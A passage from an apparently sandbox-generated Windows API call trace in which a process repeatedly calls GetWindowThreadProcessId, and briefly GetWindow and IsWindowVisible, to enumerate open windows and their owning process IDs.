	[0373.383] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xd74
	[0373.383] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xd00
	[0373.383] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xcd8
	[0373.384] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xc84
	[0373.384] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xca4
	[0373.384] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xc64
	[0373.384] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xc24
	[0373.384] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb84
	[0373.384] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xbac
	[0373.384] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x384
	[0373.385] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xab8
	[0373.385] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x33c
	[0373.385] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa44
	[0373.385] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa64
	[0373.385] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x8a8
	[0373.385] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xaf0
	[0373.386] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x88c
	[0373.386] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb04
	[0373.386] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x910
	[0373.387] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x230
	[0373.387] GetWindow (hWnd=0x102ac, uCmd=0x4) returned 0x0
	[0373.389] IsWindowVisible (hWnd=0x102ac) returned 0
	[0373.389] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xac0
	[0373.389] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xab4
	[0373.389] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xaac
	[0373.389] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x3d0
	[0373.390] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x978
	[0373.390] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa7c
	[0373.390] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x59c
	[0373.390] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa88
	[0373.390] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa6c
	[0373.390] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa68
	[0373.390] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x9f8
	[0373.390] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa04
	[0373.391] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x924
	[0373.391] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x8dc
	[0373.391] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x7dc
	[0373.391] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x768
	[0373.391] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x764
	[0373.391] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x820
	[0373.391] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x810
	[0373.392] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x794
	[0373.392] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x83c
	[0373.392] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x7ac
	[0373.392] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb44
	[0373.392] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb5c
	[0373.392] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x838
	[0373.392] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.393] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.393] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.393] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.393] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.393] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.393] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.393] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.394] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x818
	[0373.394] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x5b8
	[0373.394] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x494
	[0373.394] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x1ec
	[0373.394] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x440
	[0373.395] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x7e8
	[0373.395] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x730
	[0373.395] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x2c8
	[0373.395] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x31c
	[0373.395] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x330
	[0373.396] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x128
	[0373.396] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x5c8
	[0373.396] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x6f8
	[0373.396] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x358
	[0373.396] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x73c
	[0373.396] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb0
	[0373.396] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x250
	[0373.399] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x240
	[0373.402] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x790
	[0373.411] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x61c
	[0373.412] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x540
	[0373.412] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x538
	[0373.413] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x568
	[0373.413] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x538
	[0373.413] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x568
	[0373.413] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x538
	[0373.414] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x540
	[0373.414] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x540
	[0373.415] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x57c
	[0373.415] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x460
	[0373.415] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x554
	[0373.416] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.416] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x528
	[0373.416] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.416] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.417] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.417] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x79c
	[0373.417] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.417] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4e0
	[0373.417] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.417] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x460
	[0373.417] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x460
	[0373.418] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x44c
	[0373.418] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x778
	[0373.418] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x460
	[0373.418] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x558
	[0373.418] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.418] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4d0
	[0373.418] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x1140
	[0373.419] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xe6c
	[0373.419] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x6e8
	[0373.419] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xc6c
	[0373.419] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xf94
	[0373.419] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xffc
	[0373.419] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xf74
	[0373.419] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xf08
	[0373.420] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xf0c
	[0373.420] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xed8
	[0373.420] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xe90
	[0373.420] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xea8
	[0373.420] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xfa8
	[0373.797] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xfbc
	[0373.797] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xfb8
	[0373.797] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xfb4
	[0373.797] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xfb0
	[0373.797] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xfac
	[0373.797] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xfc0
	[0373.797] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xfd0
	[0373.797] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xf88
	[0373.798] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xf84
	[0373.798] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xf80
	[0373.798] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xde0
	[0373.798] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xddc
	[0373.798] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xdd8
	[0373.798] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xd34
	[0373.798] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xd10
	[0373.798] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xd0c
	[0373.798] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xc9c
	[0373.798] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xc74
	[0373.798] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xc1c
	[0373.799] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xc08
	[0373.799] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xabc
	[0373.799] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x24c
	[0373.799] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xbb0
	[0373.799] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xbfc
	[0373.799] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb10
	[0373.799] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x374
	[0373.799] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x368
	[0373.799] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb28
	[0373.799] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xae8
	[0373.799] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb14
	[0373.800] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x95c
	[0373.800] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa8c
	[0373.800] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x46c
	[0373.800] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb3c
	[0373.800] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa90
	[0373.800] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xad0
	[0373.800] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa9c
	[0373.800] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xaa0
	[0373.800] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb1c
	[0373.800] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x7e0
	[0373.800] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa74
	[0373.801] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x694
	[0373.801] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xa28
	[0373.801] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x9b0
	[0373.801] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x8d8
	[0373.801] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x940
	[0373.801] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x93c
	[0373.801] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4ec
	[0373.801] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x150
	[0373.801] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x720
	[0373.801] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x3c4
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x7d4
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x6c8
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb54
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb54
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb5c
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x838
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x818
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x5b8
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x494
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x1ec
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x440
	[0373.802] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x7e8
	[0373.803] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x730
	[0373.803] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x2c8
	[0373.803] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x31c
	[0373.803] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x330
	[0373.803] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x128
	[0373.803] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x5c8
	[0373.803] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x6f8
	[0373.803] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x358
	[0373.803] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x73c
	[0373.803] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0xb0
	[0373.803] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x250
	[0373.804] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x240
	[0373.804] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x790
	[0373.804] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x61c
	[0373.804] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x568
	[0373.804] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x538
	[0373.804] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x540
	[0373.804] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x460
	[0373.804] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x79c
	[0373.804] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x4e0
